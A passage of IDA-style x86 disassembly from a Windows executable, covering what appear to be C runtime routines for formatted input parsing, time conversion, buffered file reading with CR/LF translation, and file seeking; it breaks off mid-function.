loc_41BE8A: ; CODE XREF: sub_41B7F5+686�j
push ds:dword_42F56C
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_3E]
push eax
call sub_41EA59
mov ax, [ebp+var_3E]
add esp, 0Ch
mov [esi], ax
inc esi
inc esi
jmp short loc_41BEAE
; ---------------------------------------------------------------------------
loc_41BEAB: ; CODE XREF: sub_41B7F5+673�j
mov [esi], al
inc esi
loc_41BEAE: ; CODE XREF: sub_41B7F5+6B4�j
mov [ebp+var_2C], esi
jmp loc_41BE1A
; ---------------------------------------------------------------------------
loc_41BEB6: ; CODE XREF: sub_41B7F5+66D�j
inc [ebp+var_30]
jmp loc_41BE1A
; ---------------------------------------------------------------------------
loc_41BEBE: ; CODE XREF: sub_41B7F5+649�j
; sub_41B7F5+667�j
dec [ebp+var_4]
push edi
push eax
call sub_41C26B
pop ecx
pop ecx
loc_41BECA: ; CODE XREF: sub_41B7F5+633�j
cmp [ebp+var_30], esi
jz loc_41C1FB
cmp [ebp+var_E], 0
jnz loc_41C15C
inc [ebp+var_34]
cmp [ebp+var_3C], 63h
jz loc_41C15C
cmp [ebp+var_16], 0
mov eax, [ebp+var_2C]
jz short loc_41BEFC
and word ptr [eax], 0
jmp loc_41C15C
; ---------------------------------------------------------------------------
loc_41BEFC: ; CODE XREF: sub_41B7F5+6FC�j
and byte ptr [eax], 0
jmp loc_41C15C
; ---------------------------------------------------------------------------
loc_41BF04: ; CODE XREF: sub_41B7F5+466�j
mov [ebp+var_D], 1
loc_41BF08: ; CODE XREF: sub_41B7F5+203�j
; sub_41B7F5+215�j ...
mov ebx, [ebp+var_14]
cmp ebx, 2Dh
jnz short loc_41BF16
mov [ebp+var_17], 1
jmp short loc_41BF1B
; ---------------------------------------------------------------------------
loc_41BF16: ; CODE XREF: sub_41B7F5+719�j
cmp ebx, 2Bh
jnz short loc_41BF3D
loc_41BF1B: ; CODE XREF: sub_41B7F5+71F�j
dec [ebp+var_C]
jnz short loc_41BF2C
cmp [ebp+var_20], 0
jz short loc_41BF2C
mov [ebp+var_F], 1
jmp short loc_41BF3D
; ---------------------------------------------------------------------------
loc_41BF2C: ; CODE XREF: sub_41B7F5+729�j
; sub_41B7F5+72F�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41C251
pop ecx
mov ebx, eax
loc_41BF3A: ; CODE XREF: sub_41B7F5+543�j
mov [ebp+var_14], ebx
loc_41BF3D: ; CODE XREF: sub_41B7F5+4FD�j
; sub_41B7F5+52D�j ...
cmp [ebp+var_30], 0
jz loc_41C056
cmp [ebp+var_F], 0
jnz loc_41C034
loc_41BF51: ; CODE XREF: sub_41B7F5+82C�j
cmp esi, 78h
jnz short loc_41BFA5
cmp ds:dword_42F56C, 1
jle short loc_41BF6E
push 80h
push ebx
call sub_418762
pop ecx
pop ecx
jmp short loc_41BF7B
; ---------------------------------------------------------------------------
loc_41BF6E: ; CODE XREF: sub_41B7F5+768�j
mov eax, ds:off_42F360
mov al, [eax+ebx*2]
and eax, 80h
loc_41BF7B: ; CODE XREF: sub_41B7F5+777�j
test eax, eax
jz loc_41C026
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 4
pop ecx
call sub_41EB50
push ebx
mov [ebp+var_28], eax
mov [ebp+var_24], edx
call sub_41C21A
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_41BFF8
; ---------------------------------------------------------------------------
loc_41BFA5: ; CODE XREF: sub_41B7F5+75F�j
cmp ds:dword_42F56C, 1
jle short loc_41BFBA
push 4
push ebx
call sub_418762
pop ecx
pop ecx
jmp short loc_41BFC5
; ---------------------------------------------------------------------------
loc_41BFBA: ; CODE XREF: sub_41B7F5+7B7�j
mov eax, ds:off_42F360
mov al, [eax+ebx*2]
and eax, 4
loc_41BFC5: ; CODE XREF: sub_41B7F5+7C3�j
test eax, eax
jz short loc_41C026
cmp esi, 6Fh
jnz short loc_41BFE3
cmp ebx, 38h
jge short loc_41C026
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 3
pop ecx
call sub_41EB50
jmp short loc_41BFF2
; ---------------------------------------------------------------------------
loc_41BFE3: ; CODE XREF: sub_41B7F5+7D7�j
push 0
push 0Ah
push [ebp+var_24]
push [ebp+var_28]
call sub_415930
loc_41BFF2: ; CODE XREF: sub_41B7F5+7EC�j
mov [ebp+var_28], eax
mov [ebp+var_24], edx
loc_41BFF8: ; CODE XREF: sub_41B7F5+7AE�j
inc [ebp+var_1C]
lea eax, [ebx-30h]
cdq
add [ebp+var_28], eax
adc [ebp+var_24], edx
cmp [ebp+var_20], 0
jz short loc_41C010
dec [ebp+var_C]
jz short loc_41C034
loc_41C010: ; CODE XREF: sub_41B7F5+814�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41C251
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp loc_41BF51
; ---------------------------------------------------------------------------
loc_41C026: ; CODE XREF: sub_41B7F5+788�j
; sub_41B7F5+7D2�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_41C26B
pop ecx
pop ecx
loc_41C034: ; CODE XREF: sub_41B7F5+756�j
; sub_41B7F5+819�j
cmp [ebp+var_17], 0
jz loc_41C11A
mov eax, [ebp+var_28]
mov ecx, [ebp+var_24]
neg eax
adc ecx, 0
mov [ebp+var_28], eax
neg ecx
mov [ebp+var_24], ecx
jmp loc_41C11A
; ---------------------------------------------------------------------------
loc_41C056: ; CODE XREF: sub_41B7F5+74C�j
cmp [ebp+var_F], 0
jnz loc_41C112
loc_41C060: ; CODE XREF: sub_41B7F5+90A�j
cmp esi, 78h
jz short loc_41C0A4
cmp esi, 70h
jz short loc_41C0A4
cmp ds:dword_42F56C, 1
jle short loc_41C07F
push 4
push ebx
call sub_418762
pop ecx
pop ecx
jmp short loc_41C08A
; ---------------------------------------------------------------------------
loc_41C07F: ; CODE XREF: sub_41B7F5+87C�j
mov eax, ds:off_42F360
mov al, [eax+ebx*2]
and eax, 4
loc_41C08A: ; CODE XREF: sub_41B7F5+888�j
test eax, eax
jz short loc_41C104
cmp esi, 6Fh
jnz short loc_41C09D
cmp ebx, 38h
jge short loc_41C104
shl edi, 3
jmp short loc_41C0DC
; ---------------------------------------------------------------------------
loc_41C09D: ; CODE XREF: sub_41B7F5+89C�j
lea edi, [edi+edi*4]
shl edi, 1
jmp short loc_41C0DC
; ---------------------------------------------------------------------------
loc_41C0A4: ; CODE XREF: sub_41B7F5+86E�j
; sub_41B7F5+873�j
cmp ds:dword_42F56C, 1
jle short loc_41C0BC
push 80h
push ebx
call sub_418762
pop ecx
pop ecx
jmp short loc_41C0C9
; ---------------------------------------------------------------------------
loc_41C0BC: ; CODE XREF: sub_41B7F5+8B6�j
mov eax, ds:off_42F360
mov al, [eax+ebx*2]
and eax, 80h
loc_41C0C9: ; CODE XREF: sub_41B7F5+8C5�j
test eax, eax
jz short loc_41C104
push ebx
shl edi, 4
call sub_41C21A
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_41C0DC: ; CODE XREF: sub_41B7F5+8A6�j
; sub_41B7F5+8AD�j
inc [ebp+var_1C]
cmp [ebp+var_20], 0
lea edi, [edi+ebx-30h]
jz short loc_41C0EE
dec [ebp+var_C]
jz short loc_41C112
loc_41C0EE: ; CODE XREF: sub_41B7F5+8F2�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41C251
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp loc_41C060
; ---------------------------------------------------------------------------
loc_41C104: ; CODE XREF: sub_41B7F5+897�j
; sub_41B7F5+8A1�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_41C26B
pop ecx
pop ecx
loc_41C112: ; CODE XREF: sub_41B7F5+865�j
; sub_41B7F5+8F7�j
cmp [ebp+var_17], 0
jz short loc_41C11A
neg edi
loc_41C11A: ; CODE XREF: sub_41B7F5+843�j
; sub_41B7F5+85C�j ...
cmp esi, 46h
jnz short loc_41C123
and [ebp+var_1C], 0
loc_41C123: ; CODE XREF: sub_41B7F5+928�j
cmp [ebp+var_1C], 0
jz loc_41C1FB
cmp [ebp+var_E], 0
jnz short loc_41C15C
inc [ebp+var_34]
loc_41C136: ; CODE XREF: sub_41B7F5+23B�j
cmp [ebp+var_30], 0
jz short loc_41C14C
mov eax, [ebp+var_2C]
mov ecx, [ebp+var_28]
mov [eax], ecx
mov ecx, [ebp+var_24]
mov [eax+4], ecx
jmp short loc_41C15C
; ---------------------------------------------------------------------------
loc_41C14C: ; CODE XREF: sub_41B7F5+945�j
cmp [ebp+var_D], 0
mov eax, [ebp+var_2C]
jz short loc_41C159
mov [eax], edi
jmp short loc_41C15C
; ---------------------------------------------------------------------------
loc_41C159: ; CODE XREF: sub_41B7F5+95E�j
mov [eax], di
loc_41C15C: ; CODE XREF: sub_41B7F5+241�j
; sub_41B7F5+414�j ...
inc [ebp+var_15]
inc [ebp+arg_4]
mov esi, [ebp+arg_4]
jmp short loc_41C1A9
; ---------------------------------------------------------------------------
loc_41C167: ; CODE XREF: sub_41B7F5+93�j
inc [ebp+var_4]
push edi
call sub_41C251
mov ebx, eax
pop ecx
movzx eax, byte ptr [esi]
inc esi
cmp eax, ebx
mov [ebp+var_14], ebx
mov [ebp+arg_4], esi
jnz short loc_41C1D6
mov ecx, ds:off_42F360
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41C1A9
inc [ebp+var_4]
push edi
call sub_41C251
pop ecx
movzx ecx, byte ptr [esi]
inc esi
cmp ecx, eax
mov [ebp+arg_4], esi
jnz short loc_41C1E4
dec [ebp+var_4]
loc_41C1A9: ; CODE XREF: sub_41B7F5+970�j
; sub_41B7F5+99A�j
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_41C1BF
cmp byte ptr [esi], 25h
jnz short loc_41C201
mov eax, [ebp+arg_4]
cmp byte ptr [eax+1], 6Eh
jnz short loc_41C201
mov esi, eax
loc_41C1BF: ; CODE XREF: sub_41B7F5+9B8�j
mov al, [esi]
test al, al
jnz loc_41B81F
jmp short loc_41C1FB
; ---------------------------------------------------------------------------
loc_41C1CB: ; CODE XREF: sub_41B7F5+1F4�j
; sub_41B7F5+491�j
push [ebp+arg_0]
dec [ebp+var_4]
push [ebp+var_14]
jmp short loc_41C1DB
; ---------------------------------------------------------------------------
loc_41C1D6: ; CODE XREF: sub_41B7F5+98A�j
dec [ebp+var_4]
push edi
push ebx
loc_41C1DB: ; CODE XREF: sub_41B7F5+9DF�j
call sub_41C26B
pop ecx
pop ecx
jmp short loc_41C1FB
; ---------------------------------------------------------------------------
loc_41C1E4: ; CODE XREF: sub_41B7F5+9AF�j
dec [ebp+var_4]
push edi
push eax
call sub_41C26B
dec [ebp+var_4]
push edi
push ebx
call sub_41C26B
add esp, 10h
loc_41C1FB: ; CODE XREF: sub_41B7F5+1F�j
; sub_41B7F5+40A�j ...
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_41C212
loc_41C201: ; CODE XREF: sub_41B7F5+9BD�j
; sub_41B7F5+9C6�j
mov eax, [ebp+var_34]
test eax, eax
jnz short loc_41C215
cmp [ebp+var_15], al
jnz short loc_41C215
or eax, 0FFFFFFFFh
jmp short loc_41C215
; ---------------------------------------------------------------------------
loc_41C212: ; CODE XREF: sub_41B7F5+A0A�j
mov eax, [ebp+var_34]
loc_41C215: ; CODE XREF: sub_41B7F5+A11�j
; sub_41B7F5+A16�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41B7F5 endp
; =============== S U B R O U T I N E =======================================
sub_41C21A proc near ; CODE XREF: sub_41B7F5+7A3�p
; sub_41B7F5+8DC�p
arg_0 = dword ptr 4
cmp ds:dword_42F56C, 1
push esi
jle short loc_41C234
mov esi, [esp+4+arg_0]
push 4
push esi
call sub_418762
pop ecx
pop ecx
jmp short loc_41C243
; ---------------------------------------------------------------------------
loc_41C234: ; CODE XREF: sub_41C21A+8�j
mov esi, [esp+4+arg_0]
mov eax, ds:off_42F360
mov al, [eax+esi*2]
and eax, 4
loc_41C243: ; CODE XREF: sub_41C21A+18�j
test eax, eax
jnz short loc_41C24D
and esi, 0FFFFFFDFh
sub esi, 7
loc_41C24D: ; CODE XREF: sub_41C21A+2B�j
mov eax, esi
pop esi
retn
sub_41C21A endp
; =============== S U B R O U T I N E =======================================
sub_41C251 proc near ; CODE XREF: sub_41B7F5+1E1�p
; sub_41B7F5+289�p ...
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
dec dword ptr [edx+4]
js short loc_41C263
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_41C263: ; CODE XREF: sub_41C251+7�j
push edx
call sub_41C368
pop ecx
retn
sub_41C251 endp
; =============== S U B R O U T I N E =======================================
sub_41C26B proc near ; CODE XREF: sub_41B7F5+6B�p
; sub_41B7F5+3FF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFFFh
jz short locret_41C281
push [esp+arg_4]
push [esp+4+arg_0]
call sub_41EB6F
pop ecx
pop ecx
locret_41C281: ; CODE XREF: sub_41C26B+5�j
retn
sub_41C26B endp
; =============== S U B R O U T I N E =======================================
sub_41C282 proc near ; CODE XREF: sub_41B7F5+63�p
; sub_41B7F5+1D3�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
loc_41C288: ; CODE XREF: sub_41C282+1D�j
push [esp+8+arg_4]
inc dword ptr [esi]
call sub_41C251
mov edi, eax
push edi
call sub_41EB21
pop ecx
test eax, eax
pop ecx
jnz short loc_41C288
mov eax, edi
pop edi
pop esi
retn
sub_41C282 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C2A6 proc near ; CODE XREF: sub_416ACB+C9�p
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_0]
sub ebx, 76Ch
cmp ebx, 46h
jl loc_41C362
cmp ebx, 8Ah
jg loc_41C362
push esi
push edi
mov edi, [ebp+arg_4]
mov esi, ds:dword_431E14[edi*4]
add esi, [ebp+arg_8]
test bl, 3
jnz short loc_41C2E5
cmp edi, 2
jle short loc_41C2E5
inc esi
loc_41C2E5: ; CODE XREF: sub_41C2A6+37�j
; sub_41C2A6+3C�j
call sub_41EBDD
mov eax, ebx
lea ecx, [ebx-1]
imul eax, 16Dh
sar ecx, 2
mov edx, esi
mov [ebp+var_8], esi
add edx, ecx
mov [ebp+var_10], ebx
add eax, edx
mov edx, [ebp+arg_14]
lea ecx, [eax+eax*2]
mov eax, [ebp+arg_C]
mov [ebp+var_1C], eax
lea ecx, [eax+ecx*8]
imul ecx, 3Ch
add ecx, [ebp+arg_10]
imul ecx, 3Ch
add ecx, ds:dword_431D30
dec edi
cmp [ebp+arg_18], 1
mov [ebp+var_14], edi
pop edi
pop esi
lea ecx, [ecx+edx+7C558180h]
mov [ebp+arg_0], ecx
jz short loc_41C358
cmp [ebp+arg_18], 0FFFFFFFFh
jnz short loc_41C35E
cmp ds:dword_431D34, 0
jz short loc_41C35E
lea eax, [ebp+var_24]
push eax
call sub_41EE50
pop ecx
mov ecx, [ebp+arg_0]
test eax, eax
jz short loc_41C35E
loc_41C358: ; CODE XREF: sub_41C2A6+90�j
add ecx, ds:dword_431D38
loc_41C35E: ; CODE XREF: sub_41C2A6+96�j
; sub_41C2A6+9F�j ...
mov eax, ecx
jmp short loc_41C365
; ---------------------------------------------------------------------------
loc_41C362: ; CODE XREF: sub_41C2A6+13�j
; sub_41C2A6+1F�j
or eax, 0FFFFFFFFh
loc_41C365: ; CODE XREF: sub_41C2A6+BA�j
pop ebx
leave
retn
sub_41C2A6 endp
; =============== S U B R O U T I N E =======================================
sub_41C368 proc near ; CODE XREF: sub_416BA7+A9�p
; sub_41712C+2D�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz loc_41C43C
test al, 40h
jnz loc_41C43C
test al, 2
jz short loc_41C38E
or al, 20h
mov [esi+0Ch], eax
jmp loc_41C43C
; ---------------------------------------------------------------------------
loc_41C38E: ; CODE XREF: sub_41C368+1A�j
or al, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_41C3A2
push esi
call sub_41DAF8
pop ecx
jmp short loc_41C3A7
; ---------------------------------------------------------------------------
loc_41C3A2: ; CODE XREF: sub_41C368+2F�j
mov eax, [esi+8]
mov [esi], eax
loc_41C3A7: ; CODE XREF: sub_41C368+38�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push dword ptr [esi+10h]
call sub_41C441
add esp, 0Ch
mov [esi+4], eax
test eax, eax
jz short loc_41C42B
cmp eax, 0FFFFFFFFh
jz short loc_41C42B
mov edx, [esi+0Ch]
test dl, 82h
jnz short loc_41C400
mov ecx, [esi+10h]
push edi
cmp ecx, 0FFFFFFFFh
jz short loc_41C3E9
mov edi, ecx
sar edi, 5
and ecx, 1Fh
mov edi, ds:dword_4CA3C0[edi*4]
lea edi, [edi+ecx*8]
jmp short loc_41C3EE
; ---------------------------------------------------------------------------
loc_41C3E9: ; CODE XREF: sub_41C368+6B�j
mov edi, offset dword_4319E0
loc_41C3EE: ; CODE XREF: sub_41C368+7F�j
mov cl, [edi+4]
pop edi
and cl, 82h
cmp cl, 82h
jnz short loc_41C400
or dh, 20h
mov [esi+0Ch], edx
loc_41C400: ; CODE XREF: sub_41C368+62�j
; sub_41C368+90�j
cmp dword ptr [esi+18h], 200h
jnz short loc_41C41D
mov ecx, [esi+0Ch]
test cl, 8
jz short loc_41C41D
test ch, 4
jnz short loc_41C41D
mov dword ptr [esi+18h], 1000h
loc_41C41D: ; CODE XREF: sub_41C368+9F�j
; sub_41C368+A7�j ...
mov ecx, [esi]
dec eax
mov [esi+4], eax
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C42B: ; CODE XREF: sub_41C368+55�j
; sub_41C368+5A�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
and dword ptr [esi+4], 0
loc_41C43C: ; CODE XREF: sub_41C368+A�j
; sub_41C368+12�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_41C368 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C441 proc near ; CODE XREF: sub_416BA7+90�p
; sub_41C368+48�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
cmp esi, ds:dword_4CA4C0
jnb loc_41C61E
mov eax, esi
and esi, 1Fh
sar eax, 5
shl esi, 3
lea ebx, ds:4CA3C0h[eax*4]
mov eax, ds:dword_4CA3C0[eax*4]
add eax, esi
mov dl, [eax+4]
test dl, 1
jz loc_41C61E
and [ebp+var_8], 0
mov edi, [ebp+arg_4]
cmp [ebp+arg_8], 0
mov ecx, edi
jz short loc_41C4F6
test dl, 2
jnz short loc_41C4F6
test dl, 48h
jz short loc_41C4B6
mov al, [eax+5]
cmp al, 0Ah
jz short loc_41C4B6
dec [ebp+arg_8]
mov [edi], al
mov eax, [ebx]
lea ecx, [edi+1]
mov [ebp+var_8], 1
mov byte ptr [eax+esi+5], 0Ah
loc_41C4B6: ; CODE XREF: sub_41C441+56�j
; sub_41C441+5D�j
lea eax, [ebp+var_C]
push 0
push eax
mov eax, [ebx]
push [ebp+arg_8]
push ecx
push dword ptr [eax+esi]
call ds:off_422098
test eax, eax
jnz short loc_41C509
call ds:dword_42206C ; RtlGetLastWin32Error
push 5
pop ecx
cmp eax, ecx
jnz short loc_41C4F1
mov ds:dword_4C9084, 9
mov ds:dword_4C9088, ecx
jmp loc_41C62F
; ---------------------------------------------------------------------------
loc_41C4F1: ; CODE XREF: sub_41C441+99�j
cmp eax, 6Dh
jnz short loc_41C4FD
loc_41C4F6: ; CODE XREF: sub_41C441+4C�j
; sub_41C441+51�j
xor eax, eax
jmp loc_41C632
; ---------------------------------------------------------------------------
loc_41C4FD: ; CODE XREF: sub_41C441+B3�j
push eax
call sub_41D064
pop ecx
jmp loc_41C62F
; ---------------------------------------------------------------------------
loc_41C509: ; CODE XREF: sub_41C441+8C�j
mov eax, [ebx]
mov edx, [ebp+var_C]
add [ebp+var_8], edx
lea ecx, [eax+esi+4]
mov al, [eax+esi+4]
test al, 80h
jz loc_41C619
test edx, edx
jz short loc_41C52E
cmp byte ptr [edi], 0Ah
jnz short loc_41C52E
or al, 4
jmp short loc_41C530
; ---------------------------------------------------------------------------
loc_41C52E: ; CODE XREF: sub_41C441+E2�j
; sub_41C441+E7�j
and al, 0FBh
loc_41C530: ; CODE XREF: sub_41C441+EB�j
mov [ecx], al
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
mov [ebp+arg_8], eax
add ecx, eax
cmp eax, ecx
mov [ebp+var_8], ecx
jnb loc_41C613
loc_41C548: ; CODE XREF: sub_41C441+1BA�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, 1Ah
jz loc_41C603
cmp al, 0Dh
jz short loc_41C564
mov [edi], al
inc edi
inc [ebp+arg_8]
jmp loc_41C5F5
; ---------------------------------------------------------------------------
loc_41C564: ; CODE XREF: sub_41C441+116�j
dec ecx
cmp [ebp+arg_8], ecx
jnb short loc_41C582
mov eax, [ebp+arg_8]
inc eax
cmp byte ptr [eax], 0Ah
jnz short loc_41C579
add [ebp+arg_8], 2
jmp short loc_41C5D7
; ---------------------------------------------------------------------------
loc_41C579: ; CODE XREF: sub_41C441+130�j
mov byte ptr [edi], 0Dh
inc edi
mov [ebp+arg_8], eax
jmp short loc_41C5F5
; ---------------------------------------------------------------------------
loc_41C582: ; CODE XREF: sub_41C441+127�j
lea eax, [ebp+var_C]
push 0
push eax
inc [ebp+arg_8]
lea eax, [ebp+var_1]
push 1
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call ds:off_422098
test eax, eax
jnz short loc_41C5AA
call ds:dword_42206C ; RtlGetLastWin32Error
test eax, eax
jnz short loc_41C5F1
loc_41C5AA: ; CODE XREF: sub_41C441+15D�j
cmp [ebp+var_C], 0
jz short loc_41C5F1
mov eax, [ebx]
test byte ptr [eax+esi+4], 48h
jz short loc_41C5CC
mov al, [ebp+var_1]
cmp al, 0Ah
jz short loc_41C5D7
mov byte ptr [edi], 0Dh
mov ecx, [ebx]
inc edi
mov [ecx+esi+5], al
jmp short loc_41C5F5
; ---------------------------------------------------------------------------
loc_41C5CC: ; CODE XREF: sub_41C441+176�j
cmp edi, [ebp+arg_4]
jnz short loc_41C5DC
cmp [ebp+var_1], 0Ah
jnz short loc_41C5DC
loc_41C5D7: ; CODE XREF: sub_41C441+136�j
; sub_41C441+17D�j
mov byte ptr [edi], 0Ah
jmp short loc_41C5F4
; ---------------------------------------------------------------------------
loc_41C5DC: ; CODE XREF: sub_41C441+18E�j
; sub_41C441+194�j
push 1
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_41C637
add esp, 0Ch
cmp [ebp+var_1], 0Ah
jz short loc_41C5F5
loc_41C5F1: ; CODE XREF: sub_41C441+167�j
; sub_41C441+16D�j
mov byte ptr [edi], 0Dh
loc_41C5F4: ; CODE XREF: sub_41C441+199�j
inc edi
loc_41C5F5: ; CODE XREF: sub_41C441+11E�j
; sub_41C441+13F�j ...
mov ecx, [ebp+var_8]
cmp [ebp+arg_8], ecx
jb loc_41C548
jmp short loc_41C613
; ---------------------------------------------------------------------------
loc_41C603: ; CODE XREF: sub_41C441+10E�j
mov eax, [ebx]
lea esi, [eax+esi+4]
mov al, [esi]
test al, 40h
jnz short loc_41C613
or al, 2
mov [esi], al
loc_41C613: ; CODE XREF: sub_41C441+101�j
; sub_41C441+1C0�j ...
sub edi, [ebp+arg_4]
mov [ebp+var_8], edi
loc_41C619: ; CODE XREF: sub_41C441+DA�j
mov eax, [ebp+var_8]
jmp short loc_41C632
; ---------------------------------------------------------------------------
loc_41C61E: ; CODE XREF: sub_41C441+12�j
; sub_41C441+39�j
and ds:dword_4C9088, 0
mov ds:dword_4C9084, 9
loc_41C62F: ; CODE XREF: sub_41C441+AB�j
; sub_41C441+C3�j
or eax, 0FFFFFFFFh
loc_41C632: ; CODE XREF: sub_41C441+B7�j
; sub_41C441+1DB�j
pop edi
pop esi
pop ebx
leave
retn
sub_41C441 endp
; =============== S U B R O U T I N E =======================================
sub_41C637 proc near ; CODE XREF: sub_416E2E+67�p
; sub_417E43+CD�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push ebx
cmp eax, ds:dword_4CA4C0
push esi
push edi
jnb short loc_41C6B9
mov ecx, eax
mov esi, eax
sar ecx, 5
and esi, 1Fh
lea edi, ds:4CA3C0h[ecx*4]
shl esi, 3
mov ecx, [edi]
test byte ptr [ecx+esi+4], 1
jz short loc_41C6B9
push eax
call sub_41DF52
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_41C67B
mov ds:dword_4C9084, 9
jmp short loc_41C6CA
; ---------------------------------------------------------------------------
loc_41C67B: ; CODE XREF: sub_41C637+36�j
push [esp+0Ch+arg_8]
push 0
push [esp+14h+arg_4]
push eax
call ds:off_42209C
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_41C69B
call ds:dword_42206C ; RtlGetLastWin32Error
jmp short loc_41C69D
; ---------------------------------------------------------------------------
loc_41C69B: ; CODE XREF: sub_41C637+5A�j
xor eax, eax
loc_41C69D: ; CODE XREF: sub_41C637+62�j
test eax, eax
jz short loc_41C6AA
push eax
call sub_41D064
pop ecx
jmp short loc_41C6CA
; ---------------------------------------------------------------------------
loc_41C6AA: ; CODE XREF: sub_41C637+68�j
mov eax, [edi]
and byte ptr [eax+esi+4], 0FDh
lea eax, [eax+esi+4]
mov eax, ebx
jmp short loc_41C6CD
; ---------------------------------------------------------------------------
loc_41C6B9: ; CODE XREF: sub_41C637+D�j
; sub_41C637+2A�j
and ds:dword_4C9088, 0
mov ds:dword_4C9084, 9
loc_41C6CA: ; CODE XREF: sub_41C637+42�j
; sub_41C637+71�j
or eax, 0FFFFFFFFh
loc_41C6CD: ; CODE XREF: sub_41C637+80�j
pop edi
pop esi
pop ebx
retn
sub_41C637 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C6D1 proc near ; CODE XREF: sub_416E2E+2A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
xor ebx, ebx
mov esi, [edi+10h]
cmp [edi+4], ebx
mov [ebp+var_C], esi
jge short loc_41C6ED
mov [edi+4], ebx
loc_41C6ED: ; CODE XREF: sub_41C6D1+17�j
push 1
push ebx
push esi
call sub_41C637
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_4], eax
jl short loc_41C75B
mov edx, [edi+0Ch]
test dx, 108h
jnz short loc_41C712
sub eax, [edi+4]
jmp loc_41C824
; ---------------------------------------------------------------------------
loc_41C712: ; CODE XREF: sub_41C6D1+37�j
mov eax, [edi]
mov ecx, [edi+8]
mov ebx, eax
sub ebx, ecx
test dl, 3
mov [ebp+var_8], ebx
jz short loc_41C74C
mov edx, esi
mov ebx, esi
sar edx, 5
and ebx, 1Fh
mov edx, ds:dword_4CA3C0[edx*4]
test byte ptr [edx+ebx*8+4], 80h
jz short loc_41C763
mov edx, ecx
loc_41C73D: ; CODE XREF: sub_41C6D1+79�j
cmp edx, eax
jnb short loc_41C763
cmp byte ptr [edx], 0Ah
jnz short loc_41C749
inc [ebp+var_8]
loc_41C749: ; CODE XREF: sub_41C6D1+73�j
inc edx
jmp short loc_41C73D
; ---------------------------------------------------------------------------
loc_41C74C: ; CODE XREF: sub_41C6D1+50�j
test dl, 80h
jnz short loc_41C763
mov ds:dword_4C9084, 16h
loc_41C75B: ; CODE XREF: sub_41C6D1+2D�j
or eax, 0FFFFFFFFh
jmp loc_41C824
; ---------------------------------------------------------------------------
loc_41C763: ; CODE XREF: sub_41C6D1+68�j
; sub_41C6D1+6E�j ...
cmp [ebp+var_4], 0
jnz short loc_41C771
mov eax, [ebp+var_8]
jmp loc_41C824
; ---------------------------------------------------------------------------
loc_41C771: ; CODE XREF: sub_41C6D1+96�j
test byte ptr [edi+0Ch], 1
jz loc_41C81C
mov edx, [edi+4]
test edx, edx
jnz short loc_41C78A
and [ebp+var_8], edx
jmp loc_41C81C
; ---------------------------------------------------------------------------
loc_41C78A: ; CODE XREF: sub_41C6D1+AF�j
sub eax, ecx
add eax, edx
mov [ebp+arg_0], eax
mov eax, esi
sar eax, 5
and esi, 1Fh
lea ebx, ds:4CA3C0h[eax*4]
shl esi, 3
mov eax, [ebx]
test byte ptr [esi+eax+4], 80h
jz short loc_41C816
push 2
push 0
push [ebp+var_C]
call sub_41C637
add esp, 0Ch
cmp eax, [ebp+var_4]
jnz short loc_41C7DD
mov eax, [edi+8]
mov ecx, [ebp+arg_0]
add ecx, eax
